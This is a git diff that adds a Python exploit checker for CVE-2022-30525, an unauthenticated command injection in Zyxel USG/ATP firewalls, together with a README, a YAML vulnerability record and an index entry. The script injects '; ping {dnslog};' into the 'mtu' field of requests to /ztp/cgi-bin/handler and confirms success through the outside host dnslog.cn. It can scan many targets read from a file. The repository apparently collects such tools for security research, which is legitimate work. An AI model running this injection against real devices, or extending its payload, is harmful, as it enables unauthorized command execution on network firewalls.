diff --git a/.DS_Store b/.DS_Store
new file mode 100644
index 0000000000000000000000000000000000000000..d7aa354b0703b6d995a4434011fde166e69e8909
Binary files /dev/null and b/.DS_Store differ
diff --git a/cve/Zyxel/.DS_Store b/cve/Zyxel/.DS_Store
new file mode 100644
index 0000000000000000000000000000000000000000..586237459d3d61e9d30161b2348bb984b7258f0e
Binary files /dev/null and b/cve/Zyxel/.DS_Store differ
diff --git a/cve/Zyxel/2022/.DS_Store b/cve/Zyxel/2022/.DS_Store
new file mode 100644
index 0000000000000000000000000000000000000000..df4051b002d19d2094d950b9dcd090d3307a19ea
Binary files /dev/null and b/cve/Zyxel/2022/.DS_Store differ
diff --git a/cve/Zyxel/2022/CVE-2022-30535/CVE-2022-30525.py b/cve/Zyxel/2022/CVE-2022-30535/CVE-2022-30525.py
new file mode 100644
index 0000000000000000000000000000000000000000..a2b09db68866b455746a46c252de64f59ceb8a79
--- /dev/null
+++ b/cve/Zyxel/2022/CVE-2022-30535/CVE-2022-30525.py
@@ -0,0 +1,119 @@
+#!/usr/bin/env python
+# -*- conding:utf-8 -*-
+import requests
+import argparse
+import sys
+import urllib3
+import json
+import time
+import random
+import signal
+
+dnslog_res = requests.session()
+urllib3.disable_warnings()
+
+__desc__ = 'CVE-2022-30525利用dnslog批量验证'
+__author__ = 'savior'
+__date__ = '2022/05/14'
+__version__ = 'v0.1'
+__link__ = 'https://github.com/savior-only/CVE-2022-30525'
+
+
+def banner():
+    print("""
+   ██████  ██      ██ ████████        ████   ████   ████   ████         ████   ████  ██████  ████  ██████
+  ██░░░░██░██     ░██░██░░░░░        █░░░ █ █░░░██ █░░░ █ █░░░ █       █░░░ █ █░░░██░█░░░░  █░░░ █░█░░░░ 
+ ██    ░░ ░██     ░██░██            ░    ░█░█  █░█░    ░█░    ░█      ░    ░█░█  █░█░█████ ░    ░█░█████ 
+░██       ░░██    ██ ░███████  █████   ███ ░█ █ ░█   ███    ███  █████   ███ ░█ █ ░█░░░░░ █   ███ ░░░░░ █
+░██        ░░██  ██  ░██░░░░  ░░░░░   █░░  ░██  ░█  █░░    █░░  ░░░░░   ░░░ █░██  ░█     ░█  █░░       ░█
+░░██    ██  ░░████   ░██             █     ░█   ░█ █      █            █   ░█░█   ░█ █   ░█ █      █   ░█
+ ░░██████    ░░██    ░████████      ░██████░ ████ ░██████░██████      ░ ████ ░ ████ ░ ████ ░██████░ ████ 
+  ░░░░░░      ░░     ░░░░░░░░       ░░░░░░  ░░░░  ░░░░░░ ░░░░░░        ░░░░   ░░░░   ░░░░  ░░░░░░  ░░░░  
+
+
+                                                                                by {} {}
+                                                                    {}
+               """.format(__author__, __version__, __link__))
+
+
+class Dnslog:
+
+    def get_dnslog():
+        t = random.random()
+        url = f"http://www.dnslog.cn/getdomain.php?t={t}"
+        res1 = dnslog_res.get(url=url, proxies=proxies)
+        if res1.status_code == 200 and "dnslog" in res1.text:
+            dnslog = res1.text
+            return dnslog
+        else:
+            print("获取dnslog失败")
+
+
+    def get_data():
+        t = random.random()
+        url = f"http://www.dnslog.cn/getrecords.php?t={t}"
+        res2 = dnslog_res.get(url=url, proxies=proxies)
+        return res2.text
+
+class information(object):
+
+    def __init__(self,args):
+        self.args = args
+        self.url = args.url
+        self.file = args.file
+
+    def target_url(self):
+        target_url = self.url + "/ztp/cgi-bin/handler"
+        headers = {
+            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
+            "Content-Type": "application/json"
+        }
+        dnslog = Dnslog.get_dnslog()
+        data = {"command": "setWanPortSt", "proto": "dhcp", "port": "4", "vlan_tagged": "1", "vlanid": "5", "mtu": f"; ping {dnslog};", "data": "hi"}
+        try:
+            res = requests.post(url=target_url, headers=headers, data=json.dumps(data), verify=False, proxies=proxies, timeout=5)
+        except Exception as e:
+            pass
+
+        time.sleep(5)
+        data = Dnslog.get_data()
+        if dnslog in data:
+            print(f"\033[31m[{chr(8730)}] 目标系统: {self.url} 存在Zyxel 防火墙未经身份验证的远程命令注入\033[0m")
+            print("[" + "-"*100 + "]")
+        else:
+            print(f"[\033[31mx\033[0m]  目标系统: {self.url} 不存在Zyxel 防火墙未经身份验证的远程命令注入！")
+            print("[" + "-"*100 + "]")
+
+    def file_url(self):
+        with open(self.file, "r") as urls:
+            for url in urls:
+                url = url.strip()
+                if url[:4] != "http":
+                    url = "http://" + url
+                self.url = url.strip()
+                information.target_url(self)
+
+
+if __name__ == "__main__":
+    try:
+        banner()
+        parser = argparse.ArgumentParser(description='Zyxel 防火墙未经身份验证的远程命令注入', add_help=False)
+        parser.add_argument("-h", "--help", action="help", help="Show this help message and exit")
+        parser.add_argument("-u", "--url", type=str, dest="url", help="Target url eg:\"http://127.0.0.1\"")
+        parser.add_argument("-f", "--file", dest="file", help="Targets in file  eg:\"url.txt\"")
+        parser.add_argument("-proxy", dest="proxy", help="Proxy [socks5/socks4/http] (e.g. http://127.0.0.1:8080)")
+        args = parser.parse_args()
+        if args.proxy:
+            proxies = {"http": args.proxy, "https": args.proxy}
+            print("\033[31m[+] use proxy: {}\033[0m".format(args.proxy))
+        if args.url:
+            information(args).target_url()
+        elif args.file:
+            information(args).file_url()
+    #检测ctrl+c
+    except KeyboardInterrupt:
+        print("\n\033[31mYou choose to stop me.\033[0m")
+
+
+
+
diff --git a/cve/Zyxel/2022/CVE-2022-30535/README.md b/cve/Zyxel/2022/CVE-2022-30535/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..1a19e2e4f7838ecf127ff2d5bb466fd022124c05
--- /dev/null
+++ b/cve/Zyxel/2022/CVE-2022-30535/README.md
@@ -0,0 +1,30 @@
+# CVE-2022-30525
+Zyxel 防火墙未经身份验证的远程命令注入
+
+## 影响版本
+
+### 影响组件
+
+USG FLEX 100, 100W, 200, 500, 700
+USG20-VPN, USG20W-VPN
+ATP 100, 200, 500, 700, 800
+
+### 固件版本
+
+ZLD5.00 thru ZLD5.21 Patch 1
+ZLD5.10 thru ZLD5.21 Patch 1
+ZLD5.10 thru ZLD5.21 Patch 1
+
+## update
+
+-proxy
+
+
+
+## From
+https://github.com/Henry4E36/CVE-2022-30525
+
+
+# ⚠️ 免责声明
+
+此工具仅作为网络安全攻防研究交流，请使用者遵照网络安全法合理使用！ 如果使用者使用该工具出现非法攻击等违法行为，与本作者无关！
diff --git a/cve/Zyxel/2022/yaml/CVE-2022-30525.yaml b/cve/Zyxel/2022/yaml/CVE-2022-30525.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..401981c49eb0f7367bc234d66a3ccc5d750a0e0a
--- /dev/null
+++ b/cve/Zyxel/2022/yaml/CVE-2022-30525.yaml
@@ -0,0 +1,20 @@
+id: CVE-2022-30525
+source: https://github.com/savior-only/CVE-2022-30525
+info:
+  name: Zyxel 防火墙未经身份验证的远程命令注入。
+  severity: critical
+  description:
+    A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
+  scope-of-influence:
+    firmware versions 5.00 ~ 5.21
+  reference:
+    - https://nvd.nist.gov/vuln/detail/cve-2022-30525
+    - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-30525
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-30525
+    cwe-id: CWE-78
+    cnvd-id: None
+    kve-id: None
+  tags: cve2022, Vendor Advisory, VDB Entry, firmware
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 525f67acfbf87bfc74cb7820812296b92e40c764..d0af7b2e27590ac5f80f734f7cb32682c84dd54c 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -131,6 +131,8 @@ cve:
     - CVE-2022-31692
   Zimbra:
     - CVE-2022-27925
+  Zyxel:
+    - CVE-2022-30525
 cnvd:
   apache-tomcat:
     - CNVD-2020-10487